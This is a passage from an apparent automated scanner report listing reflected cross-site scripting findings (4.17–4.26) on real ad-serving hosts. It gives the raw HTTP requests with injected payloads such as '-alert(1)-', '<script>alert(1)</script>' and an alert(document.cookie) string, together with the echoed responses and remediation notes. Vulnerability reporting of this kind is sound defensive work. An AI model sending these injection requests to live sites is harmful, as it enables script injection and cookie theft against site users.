i8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66758"-alert(1)-"219072ecf8b was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78291"-alert(1)-"1aa4fa9a8f0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";

...[SNIP]...

4.19. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3a0"-alert(1)-"cc96eba19d7 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w1d3a0"-alert(1)-"cc96eba19d7&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.91

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31220"-alert(1)-"5c310f7490c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/f/1fe/%2a/c%3B232704189%3B1-0%3B0%3B50545246%3B4307-300/250%3B40436189/40453976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5u
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.msn-dm/B2343920.67

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3d94"-alert(1)-"3cf86d08147 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4153

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
.net/click%3Bh%3Dv8/3aa2/f/6b/%2a/u%3B222980277%3B4-0%3B0%3B25708763%3B4307-300/250%3B40308306/40326093/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=&e3d94"-alert(1)-"3cf86d08147=1https%3a%2f%2finsurance.lowermybills.com/auto/%3Fsourceid%3D25708763-222980277-40326093");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 3
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.msn-dm/B2343920.67

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2487d"-alert(1)-"2c5b6b5daa5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.msn-dm/B2343920.67;sz=300x250;ord=104579515?click=http://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/197075234/direct;;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 21:52:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4163

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
k.net/click%3Bh%3Dv8/3aa2/7/68/%2a/p%3B222980277%3B2-0%3B0%3B25708763%3B4307-300/250%3B40114169/40131956/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/142215812.69688405/197075234/direct/01%3fhref=2487d"-alert(1)-"2c5b6b5daa5https://insurance.lowermybills.com/auto/?sourceid=25708763-222980277-40131956");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 300;
var winH
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/dmd.ehow/computers [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/dmd.ehow/computers

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f361"><script>alert(1)</script>7e001703d00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/computers6f361"><script>alert(1)</script>7e001703d00;cat=computersoftware;scat=;sscat=;art=;qg=;tc=;vid=0;ctype=articles;ugc=0;lvl=1;rsi=;tile=3;sz=300x250;ord=4760230283606905? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 593

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=computers6f361"><script>alert(1)</script>7e001703d00&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/dmd.ehow/homepage [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/dmd.ehow/homepage

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c21"><script>alert(1)</script>57155bc0307 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/dmd.ehow/homepagee1c21"><script>alert(1)</script>57155bc0307;vid=0;ugc=0;lvl=4;sz=300x250;tile=2;ord=2735259747132? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:28:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 592

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- BEGIN STANDARD TAG - 300 x 250 - - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=300x250&entity=58661&site_code=homepagee1c21"><script>alert(1)</script>57155bc0307&section_code=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa2/3/0/%2a/h%3B228957569%3B0-0%3B0%3B45373372%3B4307-300/250%3B38375088/38392845/1%3B%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f">
...[SNIP]...

4.25. http://ad.harrenmedianetwork.com/imp [Z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97345'-alert(1)-'e55a08937c8 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=160x60097345'-alert(1)-'e55a08937c8&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:57 GMT
Content-Length: 411
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x60097345'-alert(1)-'e55a08937c8&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x60097345%27-alert%281%29-%27e55a08937c8%26s%3D429613%26_salt%3D975924496%26B%3D10%
...[SNIP]...

4.26. http://ad.harrenmedianetwork.com/imp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.harrenmedianetwork.com
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6cd7'-alert(1)-'948355e44c0 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=160x600&s=429613d6cd7'-alert(1)-'948355e44c0&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
